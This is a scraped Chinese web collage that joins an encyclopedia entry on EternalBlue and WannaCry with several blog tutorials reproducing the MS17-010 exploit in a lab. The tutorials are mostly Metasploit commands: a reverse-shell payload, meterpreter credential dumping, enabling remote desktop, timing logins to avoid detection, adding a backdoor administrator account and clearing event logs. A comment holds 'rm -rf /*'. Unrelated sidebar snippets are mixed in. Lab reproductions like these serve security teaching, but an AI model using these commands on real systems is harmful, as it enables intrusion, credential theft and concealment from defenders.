比特派网址链接|永恒之蓝
永恒之蓝_百度百科
_百度百科 网页新闻贴吧知道网盘图片视频地图文库资讯采购百科百度首页登录注册进入词条全站搜索帮助首页秒懂百科特色百科知识专题加入百科百科团队权威合作下载百科APP个人中心收藏查看我的收藏0有用+10永恒之蓝播报讨论上传视频网络攻击工具本词条由“科普中国”科学百科词条编写与应用工作项目 审核 。永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。中文名永恒之蓝属 性软件特 性病毒发生时间 2017年4月14日目录1事件经过2攻击方式3事件影响4病毒防范事件经过播报编辑2017年5月12日起,全球范围内爆发基于Windows网络共享协议进行攻击传播的蠕虫恶意代码,这是不法分子通过改造之前泄露的NSA黑客武器库中“永恒之蓝”攻击程序发起的网络攻击事件。五个小时内,包括英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件,对重要数据造成严重损失。被袭击的设备被锁定,并索要300美元比特币赎金。要求尽快支付勒索赎金,否则将删除文件,甚至提出半年后如果还没支付的穷人可以参加免费解锁的活动。原来以为这只是个小范围的恶作剧式的勒索软件,没想到该勒索软件大面积爆发,许多高校学生中招,愈演愈烈。 [1]攻击方式播报编辑恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。本次黑客使用的是Petya勒索病毒的变种Petwarp,攻击时仍然使用了永恒之蓝勒索漏洞,并会获取系统用户名与密码进行内网传播。本次爆发使用了已知OFFICE漏洞、永恒之蓝SMB漏洞、局域网感染等网络自我复制技术,使得病毒可以在短时间内呈爆发态势。同时,该病毒与普通勒索病毒不同,其不会对电脑中的每个文件都进行加密,而是通过加密硬盘驱动器主文件表(MFT),使主引导记录(MBR)不可操作,通过占用物理磁盘上的文件名,大小和位置的信息来限制对完整系统的访问,从而让电脑无法启动,相较普通勒索病毒对系统更具破坏性。 [2]事件影响播报编辑乌克兰、俄罗斯、西班牙、法国、英国等多国均遭遇到袭击,包括政府、银行、电力系统、通讯系统、能源企业、机场等重要基础设施都被波及,律师事务所DLA Piper的多个美国办事处也受到影响。中国亦有跨境企业的欧洲分部中招。 [1]病毒防范播报编辑微软已于2017 年 发布MS17-010补丁,修复了“永恒之蓝”攻击的系统漏洞,一定要及时更新Windows系统补丁;务必不要轻易打开doc、rtf等后缀的附件;内网中存在使用相同账号、密码情况的机器请尽快修改密码,未开机的电脑请确认口令修改完毕、补丁安装完成后再进行联网操作,可以下载“永恒之蓝”漏洞修复工具进行漏洞修复。 [2]新手上路成长任务编辑入门编辑规则本人编辑我有疑问内容质疑在线客服官方贴吧意见反馈投诉建议举报不良信息未通过词条申诉投诉侵权信息封禁查询与解封©2024 Baidu 使用百度前必读 | 百科协议 | 隐私政策 | 百度百科合作平台 | 京ICP证030173号 京公网安备110000020000MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法-CSDN博客
>MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法-CSDN博客
MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法
最新推荐文章于 2023-12-26 22:27:31 发布
RDrug
最新推荐文章于 2023-12-26 22:27:31 发布
阅读量7.1w
收藏
483
点赞数
76
分类专栏:
web安全
文章标签:
windows
安全
安全漏洞
metasploit
nmap
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ElsonHY/article/details/109939420
版权
web安全
专栏收录该内容
9 篇文章
6 订阅
订阅专栏
MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法
前言0x01 准备工作0x02 漏洞利用0x03 修复方案总结
前言
提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生。 该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播 。勒索病毒肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。最新统计数据显示,100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。 勒索病毒是自熊猫烧香以来影响力最大的病毒之一。 本文将利用Metasploit工具来对此漏洞进行一次漏洞利用示范以及提出修复建议。
0x01 准备工作
靶机:Windows server 2008R2(IP:192.168.178.128)攻击机:Kali 2020(IP:192.168.178.131)工具:namap(这里主要用于漏洞扫描,也可以使用nussus等其他工具)、metasploit(msf)
0x02 漏洞利用
用nmap的漏洞扫描模式
nmap --script=vuln 192.168.178.128
可以发现,靶机上扫到了4个漏洞,其中包括了MS17-010。 打开metasploit(msf很有意思的是,每次打开都会显示不同的画面。)
msfconsole
搜索ms17-010相关模块,可以看到一共找到了6个不同的模块。(选项:0-5)
search ms17-010
加载扫描模块。(选项1)
use auxiliary/scanner/smb/smb_ms17_010
查看配置选项
show options
RHOSTS显示远程主机未配置,配置目标主机。
set rhosts 192.168.178.128
开始扫描漏洞,再次证实靶机存在MS17-010漏洞。
exploit
使用永恒之蓝攻击模块:exploit/windows/smb/ms17_010_eternalblue 并设置攻击载荷:
set payload
查看选项并设置rhosts:
set rhosts 192.168.178.128
输入exploit开始攻击。 运行成功会出现meterpreter > Meterpreter 是 Metasploit 的一个扩展模块,可以调用 Metasploit 的一些功能, 对目标系统进行更深入的渗透,如获取屏幕、上传/下载文件、创建持久后门等。
演示几个功能
捕获屏幕
meterpreter > screenshot
上传/下载文件
meterpreter > upload hello.txt c://
meterpreter > download d://1.txt
远程桌面
meterpreter > run vnc
启动失败了- -好像是靶机没有启动vnc服务。
获取cmd,出现了编码问题。
meterpreter > shell
获取用户密码
meterpreter > load kiwi
Loading extension kiwi...Success.
Kiwi在32位系统中能够正常使用,到了64位系统中需要用到进程迁移 进程迁移请参考:http://hackdig.com/09/hack-144260.htm
完成进程迁移后:
meterpreter > creds_all
启用远程桌面,配合上一步获取到的密码。
meterpreter > run post/windows/manage/enable_rdp
使用时一般配合查看远程用户的空闲时长,空闲时间长再进行远程登陆,减小被发现的风险。登录rdp会把对方顶掉。
meterpreter > idletime
使用 rdesktop 命令远程连接桌面
root@kali:~# rdesktop 192.168.2.6
用上一步获取的账户密码进行登录,登录成功。
清除日志
meterpreter > clearev
清除日志前,靶机的事件查看器是这样的。(记录了大量的事件) 被清空了~ 还有很多功能选项,可以自己去查一下,就不全部罗列出来了。
0x03 修复方案
受影响的系统版本可以参照:https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/ms17-010
关闭445端口。打开防火墙,安装安全软件。安装对应补丁。
总结
为了维持操作系统的安全,我们能做到的是及时更新,安装补丁,关闭不必要的服务和端口。
优惠劵
RDrug
关注
关注
76
点赞
踩
483
收藏
觉得还不错?
一键收藏
知道了
19
评论
MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法
MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法前言0x01 准备工作0x02 漏洞利用0x03 修复方案总结前言提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生。该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播 。勒索病毒肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。最新统计数据显示,
复制链接
扫一扫
专栏目录
系统漏洞 - 永恒之蓝(MS17_010)
Stacey_4869的博客
10-10
586
本文仅作为学习,请勿用于非法用途!
AutoBlue-MS17-010:这是半自动的,完全正常工作,no-bs,非metasploit版本的MS17-010公共漏洞利用代码
02-06
MS17-010利用代码
这是一些no-bs公共漏洞利用代码,可以为永恒的蓝色漏洞利用生成有效的shellcode,并使用metasploit多处理程序编写事件侦听器的脚本。
此版本的漏洞利用程序以无需使用metasploit即可利用永恒蓝色的方式进行准备。 自动生成外壳的选项是使用具有meterpreter的msfvenom生成shellcode(即使用metasploit)或生成普通的Windows cmd shell(即不使用metasploit)。 如果希望避免完全利用msfconsole并使用netcat /您自己的shell处理程序,也可以在分段和无分段的有效负载之间进行选择。
19 条评论
您还未登录,请先
登录
后发表或查看评论
MS17-010(永恒之蓝)漏洞分析与复现
lulu001128的博客
12-01
959
MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法
EternalBlue【永恒之蓝】漏洞详解(复现、演示、远程、后门、入侵、防御)内容丰富-深入剖析漏洞原理-漏洞成因-以及报错解决方法-值得收藏!
最新发布
m0_73734159的博客
12-26
2087
2017年永恒之蓝漏洞,编号为ms17漏洞。现在只有一些低版本的电脑没有打ms17_010的补丁,windows7 以上版本几乎都没有这个漏洞了。虽然如此,此漏洞非常经典,现如今仍有很大的学习漏洞原理以及深入研究防御策略都有很大的借鉴和学习研究的意义。让大家可以对网络安全更加重视,网络安全刻不容缓,让我们为国家网络安全的建设共同努力!
MS17-010漏洞分析与复现
qq_43443410的博客
07-30
1290
一名网络空间安全专业学生所做的漏洞复现实验,如有错误或有待改进的地方,还请大家多多指教。
MS17-010漏洞分析与复现1 前置知识2 漏洞简介3 漏洞代码简析4 复现5 可能遇到的问题5.1 在Meterpreter中开启vnc后无法控制目标计算机,只能监视。
1 前置知识
SMB(Server Message Block,服务器消息块): 一个网络文件共享协议,它允许应用程序和终端用户从远端的文件服务器访问文件资源,能被用于Web链接和客户端与服务器之间的信息沟通。该协议提供了Windows.
kali初讲——Metasploit攻击ms17_010复现
萌蠢骇客
06-14
1384
Kali初讲——ms17_010漏洞,永恒之蓝复现
ms17-010(永恒之蓝) 漏洞复现与处理
diaobusi的博客
06-05
7399
ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。最近出现的 WannaCry 勒索软件就使用 ms17_010 漏洞来传播和植入勒索代码,将目标系统中的所有文件加密并威胁用户付款。
ms17-010 永恒之蓝
qq_62803993的博客
01-12
2193
什么是永恒之蓝
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
《MS17-010(永恒之蓝)—漏洞复现及防范》
热门推荐
weixin_47118413的博客
04-10
1万+
通过Kali使用msfconsole在Win7复现MS17-010(永恒之蓝)漏洞以及如何防范。
永恒之蓝漏洞 ms17_010 详解
qq_45953122的博客
10-25
1563
永恒之蓝(ms17-010)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
E015-渗透测试常用工具-使用Eternal Blues进行Windows漏洞利用.pdf
12-02
E015-渗透测试常用工具-使用Eternal Blues进行Windows漏洞利用
cyber-eternal
04-16
你好! 我是
“后端软件工程师|| 云解决方案架构师''
☰详细
我是后端软件工程师和云解决方案架构师。 我的目标不仅是建立编码,而且还提供相关且清晰的编码方法,以实现尽可能高效的编码系统,编写高性能代码,通过单元测试和集成测试来增加代码覆盖率,节省了时间和资源,以节省浪费,加快发布速度,努力工作,团队管理,决策,解决问题,强大的沟通和协作能力,从而能够激励和领导团队环境中的其他人,在团队中工作,以及在压力很大的情况下。
随时与我联系,祝您愉快!
查看我的
════════ 语言和技术
════════ 来自网络永恒
Art-is-Eternal-Happiness
03-15
Art-is-Eternal-Happiness
永恒的卡片插件「Eternal Card Plugin」-crx插件
03-12
查看并链接到您的浏览器中的永恒Warcry卡 一个浏览器,可在浏览各种网站时为粉丝创建永恒战争卡数据库链接,以制作永恒卡游戏。 当前包含的几个站点是RNGEternal.com和Reddit.com。 当将牌组列表悬停在鼠标上时,该...
react-eternal-list
03-08
React永恒的名单该程序包可以使用滚动树在删除和显示元素时使用二叉树算法来呈现无限列表项而不会出现内存问题。 检查演示,看看它是如何工作的!安装npm install --save react-eternal-list用法import React , { ...
永恒的悬停卡「Eternal Hover Card」-crx插件
03-13
这是Chrome的定制扩展。此扩展程序标识永久卡名称并添加卡图像的悬停弹出。 将鼠标悬停在永恒的卡名称上时,会弹出卡的图像。 支持语言:English (United States)
discord-bot-eternal-guesses:一个管理猜谜游戏的不和谐机器人
03-21
Eternal Guesses是一款Discord机器人,可为您的服务器运行猜谜游戏。创建猜谜游戏后,它可以将自更新帖子发布到您选择的频道,其中包含标题,说明和所有猜测的最新视图。 服务器中的任何人都可以猜测-只能猜测一次!...
ehcache eternal配置
05-27
在 Ehcache 中配置 Eternal 缓存策略很简单,只需要在 Ehcache 的配置文件中设置 `
```
maxEntriesLocalHeap="1000" eternal="true" timeToIdleSeconds="0" timeToLiveSeconds="0" overflowToDisk="false"/> ``` 其中,`eternal="true"` 表示启用 Eternal 缓存策略。其他属性的含义如下: - `name`:缓存名称; - `maxEntriesLocalHeap`:缓存最大容量; - `timeToIdleSeconds`:缓存数据空闲时间,单位为秒; - `timeToLiveSeconds`:缓存数据存活时间,单位为秒; - `overflowToDisk`:是否启用磁盘持久化。 需要注意的是,使用 Eternal 缓存策略时,`timeToIdleSeconds` 和 `timeToLiveSeconds` 属性应该设置为 0,表示永久有效。 “相关推荐”对你有帮助么? 非常没帮助 没帮助 一般 有帮助 非常有帮助 提交 RDrug CSDN认证博客专家 CSDN认证企业博客 码龄5年 暂无认证 23 原创 38万+ 周排名 30万+ 总排名 11万+ 访问 等级 571 积分 143 粉丝 136 获赞 67 评论 660 收藏 私信 关注 热门文章 MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法 71688 Ubuntu20.04系统Cuckoo sandbox所需环境搭建及安装(超详细图文) 8596 Ubuntu 图形化界面登录,报错 sorry,that didn‘t work.please try again 4399 Kali Linux版本手动更新 4172 PhpStudy使用中出现You don‘t have permission to access / on this server.解决办法 3527 分类专栏 学习笔记 7篇 web安全 9篇 安全分析 1篇 内网安全 2篇 工具 2篇 ctf Linux 1篇 kali 最新评论 MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法 古琦555: rm -rf /* Ubuntu20.04系统Cuckoo sandbox所需环境搭建及安装(超详细图文) 神使墨丘利: 请问第42步是如何进入cuckoo的欢迎界面的? Ubuntu20.04系统Cuckoo sandbox所需环境搭建及安装(超详细图文) 神使墨丘利: 为什么到第79步没有agent.py文件 JWT(Json Web Token)的原理、渗透与防御 什么都干的派森: 感谢大佬分享好文必须支持 Ubuntu20.04系统Cuckoo sandbox所需环境搭建及安装(超详细图文) 蔓蔓青萝X: 我也遇到了这个问题,请问您解决了吗 您愿意向朋友推荐“博客详情页”吗? 强烈不推荐 不推荐 一般般 推荐 强烈推荐 提交 最新文章 JWT(Json Web Token)的原理、渗透与防御 一次小破站JS代码审计出XSS漏洞思路学习 Ubuntu 图形化界面登录,报错 sorry,that didn‘t work.please try again 2023年2篇 2021年5篇 2020年16篇 目录 目录 分类专栏 学习笔记 7篇 web安全 9篇 安全分析 1篇 内网安全 2篇 工具 2篇 ctf Linux 1篇 kali 目录 评论 19 被折叠的 条评论 为什么被折叠? 到【灌水乐园】发言 查看更多评论 添加红包 祝福语 请填写红包祝福语或标题 红包数量 个 红包个数最小为10个 红包总金额 元 红包金额最低5元 余额支付 当前余额3.43元 前往充值 > 需支付:10.00元 取消 确定 下一步 知道了 成就一亿技术人! 领取后你会自动成为博主和红包主的粉丝 规则 hope_wisdom 发出的红包 实付元 使用余额支付 点击重新获取 扫码支付 钱包余额 0 抵扣说明: 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。 余额充值 漏洞考古之永恒之蓝原理及利用 - 知乎切换模式写文章登录/注册漏洞考古之永恒之蓝原理及利用网络安全自修室永恒之蓝漏洞利用及攻击 1.基础知识介绍 什么是永恒之蓝漏洞? 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具, “永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒, 英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 2.什么是SMB协议? SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间 共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上, SMB使用TCP139端口和TCP445端口。 3.SMB工作原理是什么? (1):首先客户端发送一个SMB negport 请求数据报,,并列出它所支持的所有SMB的协议版本。服务器收到请求消息后响应请求,并列出希望 使用的SMB协议版本。如果没有可以使用的协议版本则返回0XFFFFH,结束通信。 (2):协议确定后,客户端进程向服务器发起一个用户或共享的认证,这个过程是通过发送SessetupX请求数据包实现的。客户端发送一对用户 名和密码或一个简单密码到服务器,然后通过服务器发送一个SessetupX应答数据包来允许或拒绝本次连接。 (3):当客户端和服务器完成了磋商和认证之后,它会发送一个Tcon或TconX SMB数据报并列出它想访问的网络资源的名称,之后会发送一个 TconX应答数据报以表示此次连接是否接收或拒绝。 (4):连接到相应资源后,SMB客户端就能够通过open SMB打开一个文件,通过read SMB读取文件,通过write SMB写入文件,通过 close SMB关闭文件。 2.实验环境准备 1.使用kali作为攻击机,windows7(旗舰版)作为靶机,靶机IP地址未知,但kali和靶机均在同一个网段,可ping通 2.kali的地址为自动获取 3.本次实验还可以用到Nessus对靶机系统进行扫描,确认有无永恒之蓝漏洞 4.获取kali自身的IP地址 使用命令 ifconfig,和windows版本不同。windows下查看IP命令为ipconfig 查看如图: 可以看到,kali的IP地址为192.168.219.129 接下来,使用kali命令netdiscover对网络存活主机进行发现 一般情况下,第一个IP地址和最后一个IP地址可能性并不大 5.登录Nessus,对靶机系统进行扫描,确认有无永恒之蓝漏洞 登录进来后,创建一个新扫描 一般选择Basic Network Scan或者Advanced Scan就可以很好的扫描目标系统 创建一个新扫描,输入名称和要扫描IP,进行扫描,扫描将花费几分钟的时间,请耐心等待 6.使用msf对永恒之蓝漏洞进行利用和攻击 在扫描结果发现了如下漏洞,证明其存在永恒之蓝漏洞,可以进行破解(MS17-010为永恒之蓝漏洞编号) 1.在kali下输入命令msfconsole启动msf 如图:出现以下界面则表示启动成功 2.搜索ms17_010:search ms17_010 其中auxil iary/ scanner/ smb/ smb/ms17010为扫描模块,用于对目标是否存在永恒之蓝漏洞进行确认 exploit /wi ndows/ smb/ms17 010 eternalblue为攻击模块,用于对存在永恒之蓝漏洞的目标进行攻击 3.使用use auxiliary/scanner/smb/smb_ms17_010模块进行分析 4.使用show options查看模块情况 此时如果不知道应该使用什么命令,则输入options来获得帮助 在此,只关注两个命令:RHOSTS和THREADS,RHOSTS是要扫描的主机(主机段),THREADS是线程,默认是1,开始使用线程加快扫描 5.设置攻击地址,并run运行,提示貌似存在永恒之蓝漏洞(MS17-010) set RHOST 目标IP地址 run 运行 标红处说明这里貌似存在永恒之蓝漏洞,使用msf这样做也可以达到一个确认是否存在永恒之蓝漏洞的功能 设置攻击模块,并设置攻击IP地址,并run运行 6.输入 use exploit/windows/smb/ms17_010_eternalblue选择攻击模块进行攻击 设置攻击载荷:set payload windows/x64/meterpreter/reverse_tcp 设置监听主机(kali):set lhost kali的IP地址 利用exploit进行攻击:exploit 当出现 meterpreter > 时,则说明攻击成功 漏洞利用 1.显示远程主机系统信息:sysinfo 2.查看用户身份:getuid 3.对远程主机当前屏幕进行截图:screenshot 4.获得shell控制台:shell 5.输入chcp 65001即可消除乱码 6.新建一个用户 名为test,密码为123456,并提升为管理员用户 net user test 123456 /add 创建test用户,密码为:123456 net localgroup administrators test /add 将test用户拉入管理员组,提升为管理员用户 7.使用REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f2打开被攻击主机远程登录端口 8.在kali中使用rdesktop 目标的ip地址进行远程连接,用户名和密码为刚才新建的test用户 顺利弹出远程连接窗口,输入账号密码 自此,利用永恒之蓝漏洞攻击一台主机就结束了,现在只有一些低版本的电脑没有打ms17_010的补丁,windows7 以上版本几乎都没有这个漏洞了 本文由 mdnice 多平台发布发布于 2022-09-08 09:30程序员赞同 5添加评论分享喜欢收藏申请 永恒之蓝漏洞利用及攻击-CSDN博客 永恒之蓝漏洞利用及攻击 最新推荐文章于 2023-12-26 22:27:31 发布 置顶 想走安全的小白 最新推荐文章于 2023-12-26 22:27:31 发布 阅读量8.9w 收藏 492 点赞数 98 分类专栏: 漏洞原理及攻击 web前端 WINDOWS环境搭建 文章标签: 漏洞 永恒之蓝 windows 版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 本文链接:https://blog.csdn.net/wwl012345/article/details/89421881 版权 WINDOWS环境搭建 同时被 3 个专栏收录 5 篇文章 1 订阅 订阅专栏 web前端 3 篇文章 0 订阅 订阅专栏 漏洞原理及攻击 2 篇文章 5 订阅 订阅专栏 一、基础知识介绍: 1.何为永恒之蓝? 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。 2.什么是SMB协议? SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。 3.SMB工作原理是什么? (1):首先客户端发送一个SMB negport 请求数据报,,并列出它所支持的所有SMB的协议版本。服务器收到请求消息后响应请求,并列出希望使用的SMB协议版本。如果没有可以使用的协议版本则返回0XFFFFH,结束通信。 (2):协议确定后,客户端进程向服务器发起一个用户或共享的认证,这个过程是通过发送SessetupX请求数据包实现的。客户端发送一对用户名和密码或一个简单密码到服务器,然后通过服务器发送一个SessetupX应答数据包来允许或拒绝本次连接。 (3):当客户端和服务器完成了磋商和认证之后,它会发送一个Tcon或TconX SMB数据报并列出它想访问的网络资源的名称,之后会发送一个TconX应答数据报以表示此次连接是否接收或拒绝。 (4):连接到相应资源后,SMB客户端就能够通过open SMB打开一个文件,通过read SMB读取文件,通过write SMB写入文件,通过close SMB关闭文件。 二、实验环境: 1.使用kali 和windows 7旗舰版(kali作为攻击主机,windows 7旗舰版作为靶机),使用wireshark进行抓包 2.设置kali 的IP地址为自动获取,查看kali IP地址:ifconfig 可以看到kali 的IP地址是192.168.223.137 3.设置windows 7的IP地址为自动获取,查看windows 7的IP地址:ipconfig 可以看见windows 7 的IP地址为192.168.223.141 三、实验步骤: 1.测试两台主机的连通性:用kali 去Ping windows 7的主机,来测试连通性:ping 192.168.223.141 可以看见两台主机连通性良好 2.查看kali 主机数据库是否开启:service postgresql status 由上图可以看出:Active:inactive (dead)说明数据库此时是关闭的; 3.打开kali 主机的数据库: service postgresql start 4.再次查看kali 主机的数据库:service postgresql status 由上图可以看出:Active:active (exited)说明此时数据库已经打开 5.进行msfdb 数据库初始化,配置数据库相关信息:msfdb init 此时就可以进行永恒之蓝漏洞扫描,(永恒之蓝利用的是ms17_010漏洞,因此到这一步之后的任务就是在kali 里寻找ms17_010漏洞,并且利用该漏洞进行攻击,获得windows 7 的管理员权限) 6.启动msf:msfconsole 这样就成功进入了msf中,如果你的界面与该界面不同,不必诧异,msf每次都会有一个随机的界面 7.查看数据库连接情况:在msf命令提示符下:db_status(下面的msf命令提示符也说明了已经进入了msf中) postgresql connected to msf 说明已经成功连接到了msf 8.搜索ms17_010:search ms17_010 小提示:如果第一次输入search ms17_010时并没有出现如上图所示的界面,那么再次输入search ms17_010(本人当时就是输入了两遍才出来如图所示界面,所以多尝试几次)如果多次还是没有发现上述界面,那么有可能是kali 版本太低,没有ms17_010漏洞,所以建议安装更新版本的kali 9.使用ms17_010模块进行漏洞扫描,在此我使用的是下面两条命令(其他的命令也可以进行ms17_010漏洞扫描,但是能否获得系统权限就不得而知了,有兴趣可以进行实验) 扫描命令:use auxiliary/scanner/smb/smb_ms17_010 攻击命令(后面使用):use exploit/windows/smb/ms17_010_eternalblue 10.此时如果不知道应该使用什么命令,则输入options来获得帮助 在此,只关注两个命令:RHOSTS和THREADS,RHOSTS是要扫描的主机(主机段),THREADS是线程,默认是1,开始使用线程加快扫描 11.设置扫描的主机或者主机段(由于靶机IP地址是192.168.223.141,因此设置扫描主机段为192.168.223.141/24):set rhosts 192.168.223.141/24;然后设置扫描线程为20;最后输入run执行扫描。与此同时,在kali里面打开wireshark抓包工具(新建一个终端,输入wireshark即可),监听ethO 由上图可以看出,扫描出来存在ms17_010漏洞的主机,也恰好是我的靶机 通过跟踪TCP流,得到了靶机的基本信息:操作系统是windows 7,IP地址是192.168.223.141,协议为SMB2 12.进行攻击:use exploit/windows/smb/ms17_010_eternalblue 设置攻击目标(靶机):set rhost 192.168.223.141 设置攻击载荷:set payload windows/x64/meterpreter/reverse_tcp 设置监听主机(kali):set lhost 192.168.223.137 利用exploit进行攻击:exploit 攻击之后如下图所示: 可以看到监听(kali)IP(192.168.223.137)及端口(4444),被攻击主机(192.168.223.141)及端口(49159)之间已经建立了连接 四、持续攻击(种植后门) 1.显示远程主机系统信息:sysinfo 2.查看用户身份:getuid 3.对远程主机当前屏幕进行截图:screenshot 打开截图所在位置: 4.获得shell控制台:shell 上面显示转到C:\Windows\system32目录下,说明已经获得了shell的控制权。 5.进行后门植入(创建新的管理员账户) net user hack 123456 /add //在windows 7上创建一个hack的用户,以便下次访问 net localgroup administrators hack /add //将hack加入到windows 7的本地管理员组中,以便获得更大权限 net user //查看windows 7本地用户 net localgroup administrators //查看windows 7本地管理员 由上图可以看出来,的确将hack添加到windows 7 中,这样可以方便下次继续访问 自此,利用永恒之蓝漏洞攻击一台主机就结束了,现在只有一些低版本的电脑没有打ms17_010的补丁,windows7 以上版本几乎都没有这个漏洞了。 若有错误,希望各位可以指出,谢谢! 优惠劵 想走安全的小白 关注 关注 98 点赞 踩 492 收藏 觉得还不错? 一键收藏 知道了 12 评论 永恒之蓝漏洞利用及攻击 一、基础知识介绍:1.何为永恒之蓝? 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎... 复制链接 扫一扫 专栏目录 永恒之蓝检测.zip 10-20 永恒之蓝检测.zip分享给大家,请有需要的人学习下载,后续会更新各种网络安全工具,请关注后续 永恒之蓝漏洞演示 12-22 利用kali linux在windows7上演示永恒之蓝漏洞,有kali实战经验的可以看懂 12 条评论 您还未登录,请先 登录 后发表或查看评论 永恒之蓝复现(个人申明,此为个人学习的笔记,可能摘录自他人的文章,而非原创) 2301_76881678的博客 03-21 1267 永恒之蓝漏洞的复现(单人版) EternalBlue【永恒之蓝】漏洞详解(复现、演示、远程、后门、入侵、防御)内容丰富-深入剖析漏洞原理-漏洞成因-以及报错解决方法-值得收藏! 最新发布 m0_73734159的博客 12-26 2087 2017年永恒之蓝漏洞,编号为ms17漏洞。现在只有一些低版本的电脑没有打ms17_010的补丁,windows7 以上版本几乎都没有这个漏洞了。虽然如此,此漏洞非常经典,现如今仍有很大的学习漏洞原理以及深入研究防御策略都有很大的借鉴和学习研究的意义。让大家可以对网络安全更加重视,网络安全刻不容缓,让我们为国家网络安全的建设共同努力! 永恒之蓝简介 Jackson_LCY的博客 05-15 664 永恒之蓝简介 项目8:勒索病毒之永恒之蓝漏洞利用.pdf 03-31 本文档为关于永恒之蓝病毒测试步骤以及上机实战过程,使用永恒之蓝病毒达到对靶机的控制。本文档仅作对永恒之蓝病毒研究之用,请勿非法使用,谢谢! 网络攻防——永恒之蓝 weixin_46560512的博客 03-09 1万+ 主要介绍永恒之蓝程序,即 windows7的SMB协议漏洞以及相关的攻击方式。 Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复) 热门推荐 m0_65712192的博客 11-01 2万+ Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复) 永恒之蓝(EternalBlue) yy1024iy的博客 05-30 1123 